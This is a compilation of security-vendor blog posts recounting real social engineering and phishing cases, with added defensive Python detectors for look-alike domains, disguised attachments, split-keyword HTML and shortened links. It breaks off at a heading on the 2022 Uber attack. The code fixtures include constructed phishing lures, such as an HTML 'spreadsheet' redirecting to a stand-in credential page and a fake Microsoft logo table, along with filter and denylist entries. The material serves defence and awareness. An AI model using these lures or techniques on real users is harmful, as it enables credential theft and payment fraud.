10 real and famous cases of social engineering attacks

  • Updated at June 21, 2021
  • Blog , Threat Research


Social engineering is the tactic behind some of the most famous hacker attacks. It’s a method based on research and persuasion that is usually at the root of spam , phishing , and spear phishing scams, which are spread by email.

The purpose of social engineering attacks is, basically, to gain the victim’s trust to steal data and money. Social engineering incidents often also involve the use of malware , such as ransomware and trojans .

The cases of social engineering listed below will give you an idea of how these attacks work and how costly they can be for companies, people, and governments. If you ever doubted that a mere fake Apple support email could do some real damage, this list is for you.

Check out 10 social engineering attacks

1. Shark Tank, 2020

Shark Tank television judge Barbara Corcoran was tricked in a nearly USD 400,000 phishing and social engineering scam in 2020. A cybercriminal impersonated her assistant and sent an email to the bookkeeper requesting a renewal payment related to real estate investments. He used an email address similar to the legitimate one. The fraud was only discovered after the bookkeeper sent an email to the assistant’s correct address asking about the transaction.

2. Toyota, 2019

Toyota Boshoku Corporation, an auto parts supplier in the Toyota group, was the victim of a social engineering and BEC (Business Email Compromise) attack in 2019. Attackers persuaded a finance executive to change the recipient bank account details on a wire transfer; the loss amounted to about USD 37 million.

3. Cabarrus County, 2018

Cabarrus County, North Carolina, lost USD 1.7 million to a social engineering and BEC scam in 2018. Using malicious emails backed by apparently legitimate documentation, the scammers impersonated a county supplier and asked for payments to be sent to a new bank account. According to the investigation, once the money had been transferred it was diverted through several other accounts.


4. Ethereum Classic, 2017

Several people lost thousands of dollars in cryptocurrency after the Ethereum Classic website was hacked in 2017. Using social engineering against the domain registrar, hackers impersonated the owner of Classic Ether Wallet, gained control of the domain, and pointed it at their own server. The hijacked site served code that captured the private keys visitors entered to make transactions, which the criminals then used to drain Ethereum Classic from the victims' wallets.

5. Democratic Party, 2016

One of the most iconic cases of social engineering is the 2016 United States presidential election. Spear phishing attacks led to the leak of emails and documents from the Democratic Party that may have influenced the outcome, Donald Trump's victory over Hillary Clinton. The hackers sent emails styled as Google security alerts, inviting recipients to follow a link and change their passwords because of unusual activity. The fraudsters then had access to thousands of emails containing sensitive information about the Clinton campaign.

6. Ubiquiti Networks, 2015

Ubiquiti Networks, a manufacturer of networking technology, lost almost $40 million in 2015 after a phishing attack. An employee email account at a subsidiary in Hong Kong is believed to have been compromised. The attackers then impersonated employees to request fraudulent payments, which the accounting department made.


7. Sony Pictures, 2014

After its investigation, the FBI attributed the 2014 cyberattack on Sony Pictures to the North Korean government. Thousands of files, including business agreements, financial documents and employee information, were stolen. Sony Pictures had been targeted by spear phishing; it appears employees were lured by fake Apple emails.

8. Target, 2013

As a result of the 2013 Target data breach, hackers gained access to 40 million customers' payment card details. Through a phishing email, criminals installed malware at a Target partner company and used that partner's network access to reach the network of the second-largest department store retailer in the United States. Once inside, they installed malware on Target's point-of-sale systems to copy customers' credit and debit card data. What can we learn from this attack? Be very cautious about which companies and partners have access to your network, and about what they can reach once connected.

9. South Carolina Department of Revenue, 2012

Hackers stole millions of Social Security numbers and thousands of credit and debit card records from the South Carolina Department of Revenue in 2012. Employees fell for phishing scams and shared their usernames and passwords with the criminals. With those credentials in hand, the hackers gained access to the state agency's network.

10. RSA, 2011

It's estimated that RSA, a security company, spent about $66 million as a result of its 2011 data breach. The attack started with an Excel spreadsheet emailed to a small group of employees under a subject line along the lines of "Recruitment Plan". The spreadsheet carried an exploit for a then-unpatched Adobe Flash flaw, which installed a backdoor that gave the attackers a foothold in RSA's network.

How to prevent social engineering incidents

As seen in the examples, social engineering is based on the fact that the attacker gains the victim’s trust. For this reason, it’s important to pay attention to emails, check attachments and links , and be suspicious of urgent orders that mainly involve money.

Technology is also in your favor. Gatefy provides different email protection solutions for companies. For example, we have a secure email gateway solution and an anti-fraud solution (based on DMARC) that will help your business fight social engineering attacks, phishing, and other threats.


15 Examples of Real Social Engineering Attacks

Social engineering attacks are one of the main ways bad actors scam companies. Here are 15 of the biggest attacks, and how they happened.

Social engineering attacks are a type of cybercrime in which the attacker fools the target through impersonation. They might pretend to be your boss, your supplier, someone from your IT team, or your delivery company. Whoever they impersonate, the motivation is the same: extracting money or data.

1.  $100 Million Google and Facebook Spear Phishing Scam

The biggest social engineering attack of all time (as far as we know) was perpetrated by Lithuanian national Evaldas Rimasauskas against two of the world's biggest companies: Google and Facebook. Rimasauskas and his team set up a fake company, pretending to be a computer manufacturer that worked with Google and Facebook. Rimasauskas also set up bank accounts in the company's name.

The scammers then sent phishing emails to specific Google and Facebook employees, invoicing them for goods and services that the manufacturer had genuinely provided — but directing them to deposit money into their fraudulent accounts. Between 2013 and 2015, Rimasauskas and his associates cheated the two tech giants out of over $100 million.

2. Persuasive email phishing attack imitates US Department of Labor

In January 2022, Bleeping Computer described a sophisticated phishing attack designed to steal Office 365 credentials in which the attackers imitated the US Department of Labor (DoL). The scam is a noteworthy example of how convincing phishing attempts are becoming.

The attack used two methods to impersonate the DoL’s email address—spoofing the actual DoL email domain (reply@dol[.]gov) and buying up look-a-like domains, including “dol-gov[.]com” and “dol-gov[.]us”. Using these domains, the phishing emails sailed through the target organizations’ security gateways.

The emails used official DoL branding and were professionally written and invited recipients to bid on a government project. The supposed bidding instructions were included in a three-page PDF with a “Bid Now” button embedded.

On clicking the link, targets were redirected to a phishing site that looked identical to the actual DoL site, hosted at a URL such as bid-dolgov[.]us. The fake bidding site instructed users to enter their Office 365 credentials. The site even displayed an “error” message after the first input, ensuring the target would enter their credentials twice and thus reducing the possibility of mistyped credentials.

It’s easy to see how even a relatively scrupulous employee could fall for an attack like this—but the problem would not have arisen if the target organization had better email security measures in place.
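The two impersonation methods just described call for two different checks. Spoofing the real dol.gov domain is exposed by the receiving server's DMARC verdict (mail that claims the exact trusted domain without a dmarc=pass result is a spoof), whereas bought look-alikes such as dol-gov[.]com and bid-dolgov[.]us pass DMARC for their own domain and have to be caught by comparing a normalised form of the sender's domain and display name against the domains you trust. The Python below is an added example written for this article, not code from the article or from any vendor. TRUSTED_DOMAINS, the homoglyph table and the two-label suffix set are illustrative stand-ins, and it assumes your gateway stamps an Authentication-Results header that includes a dmarc= result.

```python
"""Classify the From: sender as trusted, spoofed, lookalike or unrelated.

Added example, not from the original article. Assumes the receiving mail
server writes an Authentication-Results header carrying a dmarc= verdict.
TRUSTED_DOMAINS, HOMOGLYPHS and MULTI_LABEL_SUFFIXES are illustrative.
"""
import re
from email.utils import parseaddr

TRUSTED_DOMAINS = {"dol.gov"}                          # hypothetical allow-list
MULTI_LABEL_SUFFIXES = {"co.uk", "gov.uk", "com.au"}   # stand-in for the Public Suffix List
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]
MIN_BRAND_LEN = 5   # containment test only for names long enough to be distinctive


def skeleton(text):
    """Lower-case, fold common homoglyphs, drop dots/hyphens/digits: 'dol-g0v.com' -> 'dolgovcom'."""
    s = text.lower()
    for glyph, plain in HOMOGLYPHS:
        s = s.replace(glyph, plain)
    return re.sub(r"[^a-z]", "", s)


def registrable(domain):
    """Owner-controlled part of a domain (eTLD+1), so mail.dol.gov compares as dol.gov."""
    labels = domain.lower().rstrip(".").split(".")
    n = 3 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def edit_distance(a, b):
    """Levenshtein distance, for single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like(candidate, trusted):
    """True if skeleton `candidate` is a plausible imitation of skeleton `trusted`."""
    contained = len(trusted) >= MIN_BRAND_LEN and trusted in candidate
    return contained or edit_distance(candidate, trusted) <= 1


def dmarc_verdict(authentication_results):
    """Pull the dmarc= result out of Authentication-Results; 'none' if absent."""
    m = re.search(r"\bdmarc=(\w+)", authentication_results or "", re.I)
    return m.group(1).lower() if m else "none"


def classify_sender(from_header, authentication_results):
    """Return 'trusted', 'spoofed', 'lookalike' or 'unrelated' for one message."""
    display_name, address = parseaddr(from_header)
    domain = address.rsplit("@", 1)[-1] if "@" in address else ""
    reg = registrable(domain) if domain else ""
    if reg in TRUSTED_DOMAINS:
        # Exact trusted domain: only DMARC can tell the real sender from a spoof.
        return "trusted" if dmarc_verdict(authentication_results) == "pass" else "spoofed"
    sender_skel = skeleton(reg)
    name_skel = skeleton(display_name)
    for trusted in TRUSTED_DOMAINS:
        t = skeleton(trusted)
        # Bought look-alike domain, or a trusted address planted in the display name.
        if looks_like(sender_skel, t) or (len(t) >= MIN_BRAND_LEN and t in name_skel):
            return "lookalike"
    return "unrelated"
```

In a real deployment replace MULTI_LABEL_SUFFIXES with the Public Suffix List and the homoglyph table with a Unicode confusables table, and compare against several forms of each trusted name (with and without its TLD, since dol[.]com would slip past the skeleton test above). The minimum-length guard matters: a three-letter brand name is contained in far too many honest domains.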

3. Russian hacking group targets Ukraine with spear phishing

As world leaders debate the best response to the increasingly tense situation between Russia and Ukraine, Microsoft warned in February 2022 of a new spear phishing campaign by a Russian hacking group targeting Ukrainian government agencies and NGOs.

The group—known as Gamaredon and tracked by Microsoft as ACTINIUM—has allegedly been targeting “organizations critical to emergency response and ensuring the security of Ukrainian territory” since 2021.

The initial phase of Gamaredon’s attack relies on spear phishing emails containing malware. The emails also contain a tracking pixel that informs the cybercriminals whether it has been opened.

The case is an important reminder of how cybersecurity plays an increasingly central role in international conflicts—and how all organizations should be taking steps to improve their security posture and protect against social engineering attacks.


4. Deepfake Attack on UK Energy Company

In March 2019, the CEO of a UK energy provider received a phone call from someone who sounded exactly like his boss. The call was so convincing that the CEO ended up transferring $243,000 to a “Hungarian supplier” — a bank account that actually belonged to a scammer.

This “cyber-assisted” attack might sound like something from a sci-fi movie, but, according to Nina Schick, Author of “ Deep Fakes and the Infocalypse: What You Urgently Need to Know ”, “This is not an emerging threat. This threat is here. Now.”


5. $60 Million CEO Fraud Lands CEO In Court

Austrian aircraft parts manufacturer FACC lost nearly $60 million in a so-called "CEO fraud" scam, in which scammers impersonated high-level executives and tricked employees into transferring funds. After the incident, FACC spent more money trying to sue its former CEO and finance chief, alleging that they had failed to implement adequate internal controls.

While the case failed, it’s an important reminder: cybersecurity is business-critical and everyone’s responsibility. In fact, Gartner predicts that by 2024, CEOs could be personally liable for breaches.

6. Microsoft 365 phishing scam steals user credentials

In April 2021, security researchers discovered a Business Email Compromise ( BEC ) scam that tricks the recipient into installing malicious code on their device.  Here’s how the attack works, and it’s actually pretty clever.

The target receives a blank email with a subject line about a “price revision.” The email contains an attachment that looks like an Excel spreadsheet file (.xlsx). However, the “spreadsheet” is actually a .html file in disguise.

Upon opening the (disguised) .html file, the target is directed to a website containing malicious code. The code triggers a pop-up notification, telling the user they’ve been logged out of Microsoft 365, and inviting them to re-enter their login credentials.

You can guess what happens next—the fraudulent web form sends the user’s credentials off to the cybercriminals running the scam.
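A gateway that trusts the declared file name (or the declared MIME type) passes the "spreadsheet" straight through, because both say .xlsx. The content cannot lie as easily: a real .xlsx is a ZIP archive and starts with the bytes PK\x03\x04, whereas an HTML file starts with a tag. The Python below is an added example, not code from the article. It builds a constructed message shaped like the lure described above and flags attachments whose leading bytes do not match their extension; the signature table is a small hand-written subset, not a complete file-type database.

```python
"""Flag attachments whose leading bytes contradict their file extension.

Added example, not from the original article. The sample message is
constructed inline to resemble the 'price revision' lure; SIGNATURES is a
small hand-written subset of file signatures, not a complete database.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# What content of each kind must start with (Office 2007+ files are ZIPs,
# legacy Office files are OLE compound documents).
SIGNATURES = {
    "zip": (b"PK\x03\x04",),
    "pdf": (b"%PDF-",),
    "ole": (b"\xd0\xcf\x11\xe0",),
    "png": (b"\x89PNG",),
}
# Which kind each extension is expected to contain.
EXPECTED_KIND = {
    "xlsx": "zip", "docx": "zip", "pptx": "zip", "zip": "zip",
    "xls": "ole", "doc": "ole",
    "pdf": "pdf", "png": "png",
    "html": "html", "htm": "html",
}
HTML_START = re.compile(rb"^\s*(<!doctype\s+html|<html|<head|<body|<script|<meta)", re.I)


def sniff(data):
    """Classify content by its first bytes: 'zip', 'pdf', 'ole', 'png', 'html' or 'unknown'."""
    head = data[:512]
    for kind, magics in SIGNATURES.items():
        if any(head.startswith(m) for m in magics):
            return kind
    if HTML_START.match(head):
        return "html"
    return "unknown"


def check_attachment(filename, data):
    """Return (verdict, extension, sniffed_kind).

    verdict is 'ok', 'mismatch', 'double-extension' or 'unknown-extension'."""
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    actual = sniff(data)
    if len(parts) > 2 and parts[-2] in EXPECTED_KIND:
        return ("double-extension", ext, actual)   # e.g. invoice.pdf.html
    expected = EXPECTED_KIND.get(ext)
    if expected is None:
        return ("unknown-extension", ext, actual)
    if actual != expected:
        return ("mismatch", ext, actual)           # declared .xlsx, really HTML
    return ("ok", ext, actual)


def scan_message(raw_bytes):
    """Run check_attachment over every attachment of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        verdict, _ext, actual = check_attachment(name, data)
        findings.append((name, verdict, actual))
    return findings


def build_sample_message():
    """Constructed lure: blank body, 'Price revision' subject, HTML disguised as .xlsx."""
    msg = EmailMessage()
    msg["From"] = "sales@supplier.example"
    msg["To"] = "buyer@victim.example"
    msg["Subject"] = "Price revision"
    msg.set_content("")   # the lure described above arrives with an empty body
    disguised = (b"<html><body><script>"
                 b"location.replace('https://login-microsoft.example/o365');"
                 b"</script></body></html>")
    msg.add_attachment(disguised, maintype="application",
                       subtype="vnd.openxmlformats-officedocument.spreadsheetml.sheet",
                       filename="Price_Revision.xlsx")
    # A second attachment with a genuine ZIP header, to show the non-alarming case.
    msg.add_attachment(b"PK\x03\x04" + b"\x00" * 26, maintype="application",
                       subtype="octet-stream", filename="quote.xlsx")
    return msg.as_bytes()
```

Run scan_message over the raw bytes of each inbound message at the gateway. A mismatch or double-extension finding on a document extension is a strong signal on its own; an attachment with a correct ZIP signature still needs macro and content scanning downstream, since the check only proves the container type, not that the contents are safe.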

This type of phishing—which relies on human error combined with weak defenses—has thrived during the pandemic. Phishing rates doubled in 2020, according to the latest FBI data.

7. Singapore bank phishing saga like ‘fighting a war’

Customers of the Oversea-Chinese Banking Corporation (OCBC) were hit by a string of phishing attacks and malicious transactions in 2021, leading to around S$8.5 million (Singapore dollars) of losses across approximately 470 customers.

The bank’s CEO Helen Wong described her company’s battle against the phishing attacks and subsequent fraudulent transfers as like “fighting a war.”

OCBC customers were duped into giving up their account details after receiving phishing text messages in December 2021 that appeared to come from the bank. The situation escalated quickly despite the bank shutting down fraudulent domains and alerting customers to the scam.

Wong described how, once the phishing campaign had taken hold, the fraudsters had set up “mule” accounts to receive stolen funds. No matter how quickly the bank’s security team managed to shut down a mule account, the scammers would soon find another to take its place.

The CEO described her dilemma after getting the phishing campaign under control: reimbursing customers felt like the right thing to do, but Wong feared it could incentivize further attacks. So far over 200 customers have been compensated.

8. Ransomware gang hijacks victim’s email account

In April 2021, several employees of U.K. rail operator Merseyrail received an unusual email from their boss’s email account with the subject line “Lockbit Ransomware Attack and Data Theft.” Journalists from several newspapers and tech sites were also copied in.

The email—sent by a fraudster impersonating Merseyrail’s director—revealed that the company had been hacked and had tried to downplay the incident. The email also included an image of a Merseyrail employee’s personal data.

It’s not clear how Merseyrail’s email system got compromised (although security experts suspect a spear phishing attack)—but the “double extortion” involved makes this attack particularly brutal.

The “Lockbit” gang not only exfiltrated Merseyrail’s personal data and demanded a ransom to release it—the scammers used their access to the company’s systems to launch an embarrassing publicity campaign on behalf of its director.


9. Phishing scam uses HTML tables to evade traditional email security

Criminals are always looking for new ways to evade email security software. One BEC attack, discovered in April 2021, involves a particularly devious way of sneaking through traditional email security software like Secure Email Gateways (SEGs) and rule-based Data Loss Prevention (DLP).

BEC attacks often rely on impersonating official emails from respected companies. This means embedding the company’s logos and branding into the email as image files.

Some “rule-based” email security software automatically treats image files as suspicious. If a phishing email contains a .png file of the Microsoft Windows logo, the email is more likely to be detected—but without that distinctive branding, the email won’t look like it came from Microsoft.

But once again, cyber criminals have found a way to exploit the rule-based security approach.

To imitate Microsoft’s branding, this attack uses a table instead of an image file—simply a four-square grid, colored to look like the Windows logo. The average employee is unlikely to closely inspect the logo and will automatically trust the contents of the email.

This isn’t the first time fraudsters have used tables to evade rule-based DLP software. For example, some email security filters are set up to detect certain words, like “bitcoin.” One way around this is to create a borderless table and split the word across the columns: “bi | tc | oin.”
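Both tricks defeat a filter that runs its keyword list over the raw HTML, because markup sits between the letters. The fix is to normalise the body before matching: strip the tags, join adjacent table cells without inserting a separator, and only then look for keywords. The same pass can count cells that carry a background colour and no text, which is what a four-cell "logo" table looks like to a parser. The Python below is an added example, not code from the article; both HTML bodies, the keyword list and the cell threshold are constructed for illustration.

```python
"""Normalise HTML before keyword matching, and spot colour-only 'logo' tables.

Added example, not from the original article. Both sample bodies are
constructed; KEYWORDS and the cell threshold are illustrative.
"""
import re
from html.parser import HTMLParser

KEYWORDS = ["bitcoin", "wire transfer", "password"]   # illustrative filter list


class TextCollector(HTMLParser):
    """Gathers visible text, joining adjacent table cells with no separator,
    and counts cells that carry a background colour but no text."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self.cell_stack = []           # one [has_background, saw_text] per open td/th
        self.coloured_empty_cells = 0
        self._skip = 0                 # depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "style"):
            self._skip += 1
        elif tag in ("td", "th"):
            style = (attrs.get("style") or "").lower()
            has_bg = "bgcolor" in attrs or "background" in style
            self.cell_stack.append([has_bg, False])
        elif tag in ("br", "p", "div", "tr", "li"):
            self.chunks.append("\n")   # real block boundaries stay boundaries

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1
        elif tag in ("td", "th") and self.cell_stack:
            has_bg, saw_text = self.cell_stack.pop()
            if has_bg and not saw_text:
                self.coloured_empty_cells += 1
        # Deliberately no separator on </td>: "bi|tc|oin" must rejoin as "bitcoin".

    def handle_data(self, data):
        if self._skip or not data.strip():
            return
        if self.cell_stack:
            self.cell_stack[-1][1] = True
            self.chunks.append(data.strip())   # trim cell edges so split words rejoin
        else:
            self.chunks.append(data)


def analyse(html):
    """Return (visible_text, coloured_empty_cell_count) for an HTML body."""
    p = TextCollector()
    p.feed(html)
    p.close()
    return "".join(p.chunks), p.coloured_empty_cells


def naive_find(html, keywords=KEYWORDS):
    """What a raw-HTML keyword filter sees: markup between letters hides the word."""
    low = html.lower()
    return [k for k in keywords if k.lower() in low]


def find_keywords(html, keywords=KEYWORDS):
    """Keyword match on normalised text with all whitespace removed."""
    text, _ = analyse(html)
    haystack = re.sub(r"\s+", "", text).lower()
    return [k for k in keywords if re.sub(r"\s+", "", k).lower() in haystack]


def suspect_logo_table(html, min_cells=4):
    """True if the body has at least `min_cells` coloured cells containing no text."""
    _, n = analyse(html)
    return n >= min_cells


# Constructed samples (not real messages).
SPLIT_KEYWORD = (
    "<p>Please settle the invoice in "
    "<table><tr><td>bi</td><td>tc</td><td>oin</td></tr></table>"
    " using the address below.</p>"
)
LOGO_TABLE = (
    '<table cellspacing="2"><tr>'
    '<td style="background:#f25022;width:10px;height:10px"></td>'
    '<td style="background:#7fba00;width:10px;height:10px"></td></tr>'
    '<tr><td bgcolor="#00a4ef" width="10" height="10"></td>'
    '<td bgcolor="#ffb900" width="10" height="10"></td></tr></table>'
    '<p>Your Microsoft 365 password expires today. '
    '<a href="https://login-microsoft.example">Keep password</a></p>'
)
```

find_keywords is the normalised match and naive_find the raw-HTML match it replaces. A genuine newsletter can also contain coloured empty cells, so treat suspect_logo_table as one signal to combine with sender checks rather than as a verdict on its own.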

10. Sacramento phishing attack exposes health information 

Five employees at Sacramento County revealed their login credentials to cybercriminals after receiving phishing emails on June 22, 2021.

The attack was discovered five months later , after an internal audit of workers’ email inboxes.

The breach occurred after employees received phishing emails containing a link to a malicious website. The targets entered their usernames and passwords into a fake login page which were then harvested by cybercriminals.

The attack resulted in a data breach exposing 2,096 records of health information and 816 records of “personal identification information.” The county notified the victims by email and offered free credit monitoring and identity theft services.

It remains to be seen whether this proposed resolution by the county will be enough. Protection of health information is particularly tightly regulated in the US, under the Health Insurance Portability and Accountability Act (HIPAA), and data breaches involving health data have led to some hefty lawsuits in the past.


11. Google Drive collaboration scam

In late 2020, a novel but simple social engineering scam emerged that exploited Google Drive’s notification system.

The fraud begins with the creation of a document containing malicious links to a phishing site . The scammer then tags their target in a comment on the document, asking the person to collaborate.

Once tagged, the target receives a legitimate email notification from Google containing the comment’s text and a link to the relevant document. 

If the scam works, the victim views the document, reads the comments, and feels flattered that they're being asked to collaborate. Then the victim clicks one of the malicious links, visits the phishing site, and enters their login credentials or other personal data.

This scam is particularly clever because it exploits Google’s email notification system for added legitimacy. Such notifications come straight from Google and are unlikely to trigger a spam filter.

But like all social engineering attacks, the Google Drive collaboration scam plays on the victim’s emotions : in this case, the pride and generosity we might feel when called upon for help.

Want to see a screenshot of a similar attack? We break down a spear phishing attack in which the attacker impersonates Microsoft Teams.

12. SharePoint phishing fraud targets home workers

April 2021 saw yet another phishing attack emerge that appears specifically designed to target remote workers using cloud-based software.

The attack begins when the target receives an email, written in the urgent tone favored by phishing scammers, requesting their signature on a document hosted in Microsoft SharePoint.

The email looks legitimate. It includes the SharePoint logo and branding familiar to many office workers. But the link leads to a phishing site designed to siphon off users' credentials.

Phishing attacks increasingly aim to exploit remote collaboration software— Microsoft research suggests nearly half of IT professionals cited the need for new collaboration tools as a major security vulnerability during the shift to working from home.


13. $75 Million Belgian Bank Whaling Attack

One of the most successful social engineering attacks on record was conducted against the Belgian bank Crelan. Crelan discovered that its CEO had been "whaled" during a routine internal audit, but the perpetrators got away with around $75 million (roughly €70 million) and have never been brought to justice.

Crelan fell victim to “ whaling ” — a type of spear-phishing where the scammers target high-level executives. Cybercriminals frequently try to harpoon these big targets because they have easy access to funds.

14. High-Profile Twitter Users' Accounts Compromised After Vishing Scam

In July 2020, Twitter lost control of 130 Twitter accounts , including those of some of the world’s most famous people — Barack Obama, Joe Biden, and Kanye West.

The hackers downloaded some users’ Twitter data, accessed DMs, and made Tweets requesting donations to a Bitcoin wallet. Within minutes — before Twitter could remove the tweets — the perpetrator had earned around $110,000 in Bitcoin across more than 320 transactions.

Twitter has described the incident as a “phone spear phishing” attack (also known as a “ vishing ” attack). The calls’ details remain unclear, but somehow Twitter employees were tricked into revealing account credentials that allowed access to the compromised accounts.

Following the hack, the FBI launched an investigation into Twitter’s security procedures. The scandal saw Twitter’s share price plummet by 7% in pre-market trading the following day.

15. Texas Attorney-General Warns of Delivery Company Smishing Scam

Nearly everyone gets the occasional text message that looks like it could be a potential scam. But in September 2020, one smishing (SMS phishing) attack became so widespread that the Texas Attorney-General put out a press release warning residents about it.

Victims of this scam received a fraudulent text message purporting to be from a delivery company such as DHL, UPS, or FedEx. The SMS invited the target to click a link and “claim ownership” of an undelivered package. After following the link, the target was asked to provide personal information and credit card details.

The Texas Attorney-General warned all Texans not to follow the link. He stated that delivery companies do not communicate with customers in this way, and urged anyone receiving the text message to report it to the Office of the Attorney General or the Federal Trade Commission.

Top tip: Never respond to a suspicious message, click links within SMS messages, or reveal personal or company information via SMS.

Prevent social engineering attacks in your organization

There's one common thread through all of these attacks: they're really, really hard to spot. That's where Tessian comes in. Tessian is intelligent cloud email security that stops threats and builds smart security cultures in the modern enterprise.

Powered by machine learning, Tessian analyzes and learns from an organization's current and historical email data and protects employees against inbound email security threats, including whaling, CEO fraud, BEC, spear phishing, and other targeted social engineering attacks.

To learn more about how Tessian can protect your people and data against social engineering attacks on email, book a demo today . Or, if you’d rather just stay up-to-date with the latest social engineering attacks, subscribe to our weekly blog digest. You’ll get news, threat intel, and insights from security leaders for security leaders straight to your inbox.


5 Examples of Top Social Engineering Attacks

There’s something both humbling and terrifying about watching industry giants like Twitter and Uber fall victim to cyber attacks.

It's an important reflection for smaller-scale companies who’ve faced a breach of their own, graciously reminding them that even the big dogs fall for the bad guy— and a haunting reminder that even the most elite security defenses can be compromised. 

In this round up, we’re taking a look at some of the top social engineering attacks in which small mistakes cost these businesses greatly. These attacks stand out for their severity and notoriety and we hope that these brand’s blunders may become valuable lessons for improving your company’s own cybersecurity. 

5 Top Social Engineering Attacks

1. 2016 US Presidential Election Email Leak

One of the top hacks of the decade was the leak of the Democratic campaign's emails, which dominated the news for months.

Bad actors from Russia sent a series of spear phishing emails to individuals in the Democratic National Committee's network, posing as Google and warning recipients of suspicious activity on their Google accounts. The email shortened the malicious link with a Bitly URL, hiding its true destination.

Once the shortened link was clicked, the web page asked recipients to change their password. After targets entered their credentials on the spoofed page, the criminals gained full access to their Google accounts, including Gmail, and exfiltrated thousands of emails containing sensitive information about Hillary Clinton's campaign.

Social Engineering Attack Lesson Learned

Even if you know to think before you click, be cautious of shortened URLs. A shortened URL also defeats filters that judge a link by its visible destination: the filter sees only the shortener's domain and cannot know where the redirect ends unless it expands the link first.

There are few circumstances in which a reputable company will send you a shortened URL, so if you see a Bitly link, proceed with caution: it could lead to a credential-harvesting page or to malware.
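A filter that only sees the visible link cannot judge a bit.ly URL, but it can expand it: request each hop without letting the HTTP library follow redirects on its own, record the chain, and evaluate the final destination instead of the shortener. The Python below is an added example, not code from the post. The fetch function is injected so the walk can be exercised offline against a constructed redirect map; the real fetcher, http_head, uses only the standard library, and the shortener list and denylist are illustrative.

```python
"""Expand a shortened link hop by hop, then judge the final destination.

Added example, not from the original post. `fetch` is injected so the walk
runs offline against a constructed redirect map; http_head is the real
fetcher and uses only the standard library. SHORTENERS and BLOCKED_DOMAINS
are illustrative.
"""
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

SHORTENERS = {"bit.ly", "bitly.com", "t.co", "tinyurl.com", "goo.gl", "ow.ly", "is.gd", "cutt.ly"}
BLOCKED_DOMAINS = {"accounts-google-security.example"}   # hypothetical denylist entry
REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface each 3xx instead of silently following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_head(url, timeout=5):
    """One hop: return (status, Location header or None) without following it."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD",
                                 headers={"User-Agent": "link-expander/1.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:        # 3xx lands here once redirects are disabled
        return err.code, err.headers.get("Location")


def expand(url, fetch=http_head, max_hops=6):
    """Return the redirect chain starting at `url`; stops on a non-redirect, a loop or max_hops."""
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in REDIRECT_CODES or not location:
            return chain
        nxt = urljoin(chain[-1], location)      # Location may be relative
        chain.append(nxt)
        if nxt in seen:
            return chain                        # loop: the repeat stays visible in the chain
        seen.add(nxt)
    return chain


def verdict(url, fetch=http_head):
    """Return (decision, reasons, chain) where decision is 'allow', 'review' or 'block'."""
    chain = expand(url, fetch=fetch)
    final = urlparse(chain[-1])
    host = final.hostname or ""
    reasons = []
    if host in BLOCKED_DOMAINS:
        reasons.append("final destination is on the denylist")
    if host in SHORTENERS:
        reasons.append("still on a shortener after expansion (hop limit or dead link)")
    if final.scheme != "https":
        reasons.append("final destination is not https")
    if len(chain) > 3:
        reasons.append("unusually long redirect chain")
    if len(set(chain)) != len(chain):
        reasons.append("redirect loop")
    if "final destination is on the denylist" in reasons:
        return "block", reasons, chain
    return ("review" if reasons else "allow"), reasons, chain


# Constructed redirect map standing in for the network (not real links).
SAMPLE_REDIRECTS = {
    "https://bit.ly/3abcXYZ": (301, "https://t.co/q1w2e3"),
    "https://t.co/q1w2e3": (302, "http://accounts-google-security.example/reset?u=victim"),
    "http://accounts-google-security.example/reset?u=victim": (200, None),
    "https://bit.ly/newsletter": (301, "/2021/news"),            # relative Location header
    "https://bit.ly/2021/news": (302, "https://www.example.org/2021/news"),
    "https://www.example.org/2021/news": (200, None),
    "https://is.gd/loop1": (302, "https://is.gd/loop2"),
    "https://is.gd/loop2": (302, "https://is.gd/loop1"),
}


def sample_fetch(url):
    """Offline stand-in for http_head, backed by SAMPLE_REDIRECTS."""
    return SAMPLE_REDIRECTS.get(url, (404, None))
```

Expand links from an isolated egress rather than the user's machine, since fetching a tracked link tells the sender that the message was delivered and opened. Some shorteners refuse HEAD, in which case http_head needs a GET fallback that discards the body; and the final-hop check is only as good as the denylist and reputation data you put behind it.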

2. 2020 Twitter Bitcoin Scam

The Twitter Bitcoin scam , proved that not even the social media giants are impervious to cyber breaches. 

Prominent Twitter users with the trusted blue verification check mark tweeted "double your Bitcoin" offers, telling their followers that any donation sent to a given address would be doubled. Well-respected leaders, celebrities, and big brands, including former U.S. President Barack Obama, media billionaire Mike Bloomberg, and Apple, were among the accounts affected. Because the targeted accounts had millions of followers, the bad actors received hundreds of contributions within minutes, reportedly totaling over $100K in Bitcoin, according to the BBC.

This account takeover was done through a series of highly targeted social engineering attacks. Bad actors tricked Twitter employees over the phone into handing over credentials for internal support tools. From there, they made their way through Twitter's internal systems and gained access that let them take over verified users' accounts.

Twitter employees were the company’s biggest weakness, falling for social engineering exploits that allowed the bad actors a backdoor into highly-sensitive login information. It’s important to learn more about how social engineers trick employees and educate your team on social engineering red flags .

3. 2022 Attack on Uber

